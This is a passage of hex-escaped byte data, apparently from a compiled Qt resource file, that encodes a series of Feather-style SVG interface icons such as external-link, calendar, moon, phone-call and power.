\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x63\x6f\x6c\x75\x6d\
\x6e\x73\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x31\x32\
\x20\x33\x68\x37\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\x20\x32\
\x20\x32\x76\x31\x34\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\x2d\
\x32\x20\x32\x68\x2d\x37\x6d\x30\x2d\x31\x38\x48\x35\x61\x32\x20\
\x32\x20\x30\x20\x30\x20\x30\x2d\x32\x20\x32\x76\x31\x34\x61\x32\
\x20\x32\x20\x30\x20\x30\x20\x30\x20\x32\x20\x32\x68\x37\x6d\x30\
\x2d\x31\x38\x76\x31\x38\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\
\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x84\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x65\x78\x74\x65\x72\
\x6e\x61\x6c\x2d\x6c\x69\x6e\x6b\x22\x3e\x3c\x70\x61\x74\x68\x20\
\x64\x3d\x22\x4d\x31\x38\x20\x31\x33\x76\x36\x61\x32\x20\x32\x20\
\x30\x20\x30\x20\x31\x2d\x32\x20\x32\x48\x35\x61\x32\x20\x32\x20\
\x30\x20\x30\x20\x31\x2d\x32\x2d\x32\x56\x38\x61\x32\x20\x32\x20\
\x30\x20\x30\x20\x31\x20\x32\x2d\x32\x68\x36\x22\x3e\x3c\x2f\x70\
\x61\x74\x68\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x20\x70\x6f\
\x69\x6e\x74\x73\x3d\x22\x31\x35\x20\x33\x20\x32\x31\x20\x33\x20\
\x32\x31\x20\x39\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\x69\x6e\x65\
\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x30\x22\x20\x79\
\x31\x3d\x22\x31\x34\x22\x20\x78\x32\x3d\x22\x32\x31\x22\x20\x79\
\x32\x3d\x22\x33\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\
\x76\x67\x3e\
\x00\x00\x01\x72\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x76\x6f\x6c\x75\x6d\
\x65\x2d\x78\x22\x3e\x3c\x70\x6f\x6c\x79\x67\x6f\x6e\x20\x70\x6f\
\x69\x6e\x74\x73\x3d\x22\x31\x31\x20\x35\x20\x36\x20\x39\x20\x32\
\x20\x39\x20\x32\x20\x31\x35\x20\x36\x20\x31\x35\x20\x31\x31\x20\
\x31\x39\x20\x31\x31\x20\x35\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x67\
\x6f\x6e\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x32\x33\x22\
\x20\x79\x31\x3d\x22\x39\x22\x20\x78\x32\x3d\x22\x31\x37\x22\x20\
\x79\x32\x3d\x22\x31\x35\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\
\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x37\x22\x20\x79\x31\x3d\
\x22\x39\x22\x20\x78\x32\x3d\x22\x32\x33\x22\x20\x79\x32\x3d\x22\
\x31\x35\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\
\x3e\
\x00\x00\x01\x2f\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x66\x61\x63\x65\x62\
\x6f\x6f\x6b\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x31\
\x38\x20\x32\x68\x2d\x33\x61\x35\x20\x35\x20\x30\x20\x30\x20\x30\
\x2d\x35\x20\x35\x76\x33\x48\x37\x76\x34\x68\x33\x76\x38\x68\x34\
\x76\x2d\x38\x68\x33\x6c\x31\x2d\x34\x68\x2d\x34\x56\x37\x61\x31\
\x20\x31\x20\x30\x20\x30\x20\x31\x20\x31\x2d\x31\x68\x33\x7a\x22\
\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x9a\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x63\x61\x6c\x65\x6e\
\x64\x61\x72\x22\x3e\x3c\x72\x65\x63\x74\x20\x78\x3d\x22\x33\x22\
\x20\x79\x3d\x22\x34\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x31\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x31\x38\x22\x20\x72\x78\
\x3d\x22\x32\x22\x20\x72\x79\x3d\x22\x32\x22\x3e\x3c\x2f\x72\x65\
\x63\x74\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x36\x22\
\x20\x79\x31\x3d\x22\x32\x22\x20\x78\x32\x3d\x22\x31\x36\x22\x20\
\x79\x32\x3d\x22\x36\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\
\x69\x6e\x65\x20\x78\x31\x3d\x22\x38\x22\x20\x79\x31\x3d\x22\x32\
\x22\x20\x78\x32\x3d\x22\x38\x22\x20\x79\x32\x3d\x22\x36\x22\x3e\
\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\
\x22\x33\x22\x20\x79\x31\x3d\x22\x31\x30\x22\x20\x78\x32\x3d\x22\
\x32\x31\x22\x20\x79\x32\x3d\x22\x31\x30\x22\x3e\x3c\x2f\x6c\x69\
\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x34\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x70\x6f\x77\x65\x72\
\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x31\x38\x2e\x33\
\x36\x20\x36\x2e\x36\x34\x61\x39\x20\x39\x20\x30\x20\x31\x20\x31\
\x2d\x31\x32\x2e\x37\x33\x20\x30\x22\x3e\x3c\x2f\x70\x61\x74\x68\
\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x32\x22\x20\x79\
\x31\x3d\x22\x32\x22\x20\x78\x32\x3d\x22\x31\x32\x22\x20\x79\x32\
\x3d\x22\x31\x32\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\
\x76\x67\x3e\
\x00\x00\x01\x1f\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x62\x6f\x6f\x6b\x6d\
\x61\x72\x6b\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x31\
\x39\x20\x32\x31\x6c\x2d\x37\x2d\x35\x2d\x37\x20\x35\x56\x35\x61\
\x32\x20\x32\x20\x30\x20\x30\x20\x31\x20\x32\x2d\x32\x68\x31\x30\
\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\x20\x32\x20\x32\x7a\x22\
\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x6e\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x73\x70\x65\x61\x6b\
\x65\x72\x22\x3e\x3c\x72\x65\x63\x74\x20\x78\x3d\x22\x34\x22\x20\
\x79\x3d\x22\x32\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x31\x36\x22\
\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x30\x22\x20\x72\x78\x3d\
\x22\x32\x22\x20\x72\x79\x3d\x22\x32\x22\x3e\x3c\x2f\x72\x65\x63\
\x74\x3e\x3c\x63\x69\x72\x63\x6c\x65\x20\x63\x78\x3d\x22\x31\x32\
\x22\x20\x63\x79\x3d\x22\x31\x34\x22\x20\x72\x3d\x22\x34\x22\x3e\
\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\
\x31\x3d\x22\x31\x32\x22\x20\x79\x31\x3d\x22\x36\x22\x20\x78\x32\
\x3d\x22\x31\x32\x2e\x30\x31\x22\x20\x79\x32\x3d\x22\x36\x22\x3e\
\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x19\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x6d\x6f\x6f\x6e\x22\
\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x32\x31\x20\x31\x32\
\x2e\x37\x39\x41\x39\x20\x39\x20\x30\x20\x31\x20\x31\x20\x31\x31\
\x2e\x32\x31\x20\x33\x20\x37\x20\x37\x20\x30\x20\x30\x20\x30\x20\
\x32\x31\x20\x31\x32\x2e\x37\x39\x7a\x22\x3e\x3c\x2f\x70\x61\x74\
\x68\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\xb1\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x7a\x61\x70\x2d\x6f\
\x66\x66\x22\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x20\x70\x6f\
\x69\x6e\x74\x73\x3d\x22\x31\x32\x2e\x34\x31\x20\x36\x2e\x37\x35\
\x20\x31\x33\x20\x32\x20\x31\x30\x2e\x35\x37\x20\x34\x2e\x39\x32\
\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\x70\x6f\
\x6c\x79\x6c\x69\x6e\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x31\
\x38\x2e\x35\x37\x20\x31\x32\x2e\x39\x31\x20\x32\x31\x20\x31\x30\
\x20\x31\x35\x2e\x36\x36\x20\x31\x30\x22\x3e\x3c\x2f\x70\x6f\x6c\
\x79\x6c\x69\x6e\x65\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x20\
\x70\x6f\x69\x6e\x74\x73\x3d\x22\x38\x20\x38\x20\x33\x20\x31\x34\
\x20\x31\x32\x20\x31\x34\x20\x31\x31\x20\x32\x32\x20\x31\x36\x20\
\x31\x36\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\
\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x22\x20\x79\x31\x3d\x22\
\x31\x22\x20\x78\x32\x3d\x22\x32\x33\x22\x20\x79\x32\x3d\x22\x32\
\x33\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\
\x00\x00\x02\x40\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x70\x68\x6f\x6e\x65\
\x2d\x63\x61\x6c\x6c\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\
\x4d\x31\x35\x2e\x30\x35\x20\x35\x41\x35\x20\x35\x20\x30\x20\x30\
\x20\x31\x20\x31\x39\x20\x38\x2e\x39\x35\x4d\x31\x35\x2e\x30\x35\
\x20\x31\x41\x39\x20\x39\x20\x30\x20\x30\x20\x31\x20\x32\x33\x20\
\x38\x2e\x39\x34\x6d\x2d\x31\x20\x37\x2e\x39\x38\x76\x33\x61\x32\
\x20\x32\x20\x30\x20\x30\x20\x31\x2d\x32\x2e\x31\x38\x20\x32\x20\
\x31\x39\x2e\x37\x39\x20\x31\x39\x2e\x37\x39\x20\x30\x20\x30\x20\
\x31\x2d\x38\x2e\x36\x33\x2d\x33\x2e\x30\x37\x20\x31\x39\x2e\x35\
\x20\x31\x39\x2e\x35\x20\x30\x20\x30\x20\x31\x2d\x36\x2d\x36\x20\
\x31\x39\x2e\x37\x39\x20\x31\x39\x2e\x37\x39\x20\x30\x20\x30\x20\
\x31\x2d\x33\x2e\x30\x37\x2d\x38\x2e\x36\x37\x41\x32\x20\x32\x20\
\x30\x20\x30\x20\x31\x20\x34\x2e\x31\x31\x20\x32\x68\x33\x61\x32\
\x20\x32\x20\x30\x20\x30\x20\x31\x20\x32\x20\x31\x2e\x37\x32\x20\
\x31\x32\x2e\x38\x34\x20\x31\x32\x2e\x38\x34\x20\x30\x20\x30\x20\
\x30\x20\x2e\x37\x20\x32\x2e\x38\x31\x20\x32\x20\x32\x20\x30\x20\
\x30\x20\x31\x2d\x2e\x34\x35\x20\x32\x2e\x31\x31\x4c\x38\x2e\x30\
\x39\x20\x39\x2e\x39\x31\x61\x31\x36\x20\x31\x36\x20\x30\x20\x30\
\x20\x30\x20\x36\x20\x36\x6c\x31\x2e\x32\x37\x2d\x31\x2e\x32\x37\
\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\x20\x32\x2e\x31\x31\x2d\
\x2e\x34\x35\x20\x31\x32\x2e\x38\x34\x20\x31\x32\x2e\x38\x34\x20\
\x30\x20\x30\x20\x30\x20\x32\x2e\x38\x31\x2e\x37\x41\x32\x20\x32\
\x20\x30\x20\x30\x20\x31\x20\x32\x32\x20\x31\x36\x2e\x39\x32\x7a\
\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x18\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x73\x71\x75\x61\x72\
\x65\x22\x3e\x3c\x72\x65\x63\x74\x20\x78\x3d\x22\x33\x22\x20\x79\
\x3d\x22\x33\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x31\x38\x22\x20\
\x68\x65\x69\x67\x68\x74\x3d\x22\x31\x38\x22\x20\x72\x78\x3d\x22\
\x32\x22\x20\x72\x79\x3d\x22\x32\x22\x3e\x3c\x2f\x72\x65\x63\x74\
\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x02\x08\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x70\x68\x6f\x6e\x65\
\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x32\x32\x20\x31\
